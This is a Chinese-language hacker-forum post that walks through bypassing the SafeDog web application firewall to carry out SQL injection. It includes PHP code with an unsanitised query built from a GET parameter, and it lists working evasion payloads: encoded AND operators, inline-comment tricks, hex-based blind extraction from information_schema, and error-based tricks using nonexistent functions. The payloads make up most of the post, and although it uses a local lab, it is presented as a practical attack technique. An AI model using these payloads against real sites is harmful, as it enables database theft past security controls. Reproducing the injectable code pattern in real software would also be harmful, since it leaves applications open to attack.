Jump to content
  • Hello visitors, welcome to the Hacker World Forum!

    Red Team 1949  (formerly CHT Attack and Defense Team) In this rapidly changing Internet era, we maintain our original intention and create the best community to jointly exchange network technologies. You can obtain hacker attack and defense skills and knowledge in the forum, or you can join our Telegram communication group to discuss and communicate in real time. All kinds of advertisements are prohibited in the forum. Please register as a registered user to check our usage and privacy policy. Thank you for your cooperation.

    TheHackerWorld Official

绕过安全狗新版进行SQL注入

 Share


Recommended Posts

EpamNQ.md.png

正文

首先我是用phpstudy+安全狗4.0搭建的环境
一开始找不到apache名称,按照网上的来整也不行(一堆重复的沙雕)

解决方法:

以管理员权限运行cmd,进入apache/bin目录
httpd -k install -n apache2.4

以管理员权限运行cmd,进入mysql/bin目录
mysqld -k install -n MySQla

 

php代码如下

<?php
$username="root";
$password="root";
$host="localhost:3306";
$database="test";
$con=mysqli_connect($host,$username,$password,$database);
if(!$con){
    exit("Connect mysql faild....");
}
if(isset($_GET['id'])){
    $sql="select * from demo where id=".$_GET['id'];
    echo $sql;
    echo "<br>";
    $cha=mysqli_query($con,$sql);
    $jg=mysqli_fetch_array($cha);
    var_dump($jg);
}
?>

数据库表和字段如下
EpaxK0.png

尝试and 1=1和and 1=2毫无疑问被拦截了

EpamNQ.png

使用 %26%26 True 和 %26%26 False

%26=&
&=andEparDK.png
EpdA2R.png

使用Xor True 和 Xor False 也不拦

Epd8xI.md.png
EpwFw8.png

order内联注释就可以绕过

http://127.0.0.1/sqli.php?id=1/**//*!order*//**//*!by*//**//*!1*/

 

EpwQmV.md.png
EpwJfJ.png

union select卡住了。。。怎么也绕不过,后面改去整盲注了

EpBDRH.md.png

and length(database())=8被杀,后面看了网上的文章,@@version database/**/() 这样写不会被杀

http://127.0.0.1/sqli.php?id=1 %26%26 (length(database/**/())=4)

 

EpBcLt.png
http://127.0.0.1/sqli.php?id=1 %26%26 (ascii(@@version)=53)

 

EpBOoT.png

判断有多少个表

http://127.0.0.1/sqli.php?id=1 %26%26 (1=(select count(/*!table_name*/) from information_schema.tables where table_schema=0x74657374))

 

EpDkTK.png

猜表,由于这里使用ascii会被拦截,还有table_name也拦截

Eprn4U.md.png

使用hex函数代替ascii函数,使用count(/!table_name/)

http://127.0.0.1/sqli.php?id=1 %26%26 (hex(substr((select concat(/*!table_name*/) from information_schema.tables where table_schema=0x74657374 limit 0,1),1,1)))

 

Ep6lvQ.md.png
http://127.0.0.1/sqli.php?id=1 %26%26 (hex(substr((select concat(/*!table_name*/) from information_schema.tables where table_schema=0x74657374 limit 0,1),1,1))=64)

 

Ep6N5V.png

猜字段个数

http://127.0.0.1/sqli.php?id=1 %26%26 (2=(select count(/*!column_name*/) from information_schema.columns where table_name=0x64656D6F))

 

Ep6rr9.png

猜字段

http://127.0.0.1/sqli.php?id=1 %26%26 (hex(substr((select concat(/*!column_name*/) from information_schema.columns where table_name=0x64656D6F limit 0,1),1,1)))

 

EpccLj.png
http://127.0.0.1/sqli.php?id=1 %26%26 (hex(substr((select concat(/*!column_name*/) from information_schema.columns where table_name=0x64656D6F limit 0,1),1,1))=69)v 

 

EpcHOJ.md.png

猜字段内容有多少个

http://127.0.0.1/sqli.php?id=1 %26%26 (1=(select count(/*!name*/) from demo))
http://127.0.0.1/sqli.php?id=1%20%26%26%20(1=(select%20count(/*!name*/

from demo)))

猜字段内容

http://127.0.0.1/sqli.php?id=1 %26%26 (hex(substr((select concat(/*!name*/) from demo limit 0,1),1,1))=64)

 

Epgb38.png

报错注入绕过安全狗
修改php代码

<?php
$username="root";
$password="root";
$host="localhost:3306";
$database="test";
$con=mysqli_connect($host,$username,$password,$database);
if(!$con){
    exit("Connect mysql faild....");
}
if(isset($_GET['id'])){
    $sql="select * from demo where id=".$_GET['id'];
    echo $sql;
    echo "<br>";
    $cha=mysqli_query($con,$sql);
    $jg=mysqli_fetch_array($cha);
    if(!isset($jg)){
        $error=mysqli_error($con);
        echo $error;
        exit();
    }
    var_dump($jg);
}
?>

updatexml(1,,1) #安全狗正则匹配(1,内容,1)不论里面是什么都杀,还有过滤concat(0x7e,,0x7e) 总之过滤了逗号,然后各种报错注入折腾了半天
Ep2HaR.md.png

然后从印象笔记翻出一篇文章= =里面用的操作可真骚

http://127.0.0.1/sqli.php?id=1-a()
  • 1

用一个不存在的函数即可获取数据库名

EpOErR.png

输入一个存在的列名即可获取:数据库名,表名,字段名
可以拿sqlmap跑字段名的字典配合burp爆破

http://127.0.0.1/sqli.php?id=1 %26%26 polygon(id)
Link to post
Link to comment
Share on other sites

 Share

discussion group

discussion group

    You don't have permission to chat.
    • Recently Browsing   0 members

      • No registered users viewing this page.
    ×
    ×
    • Create New...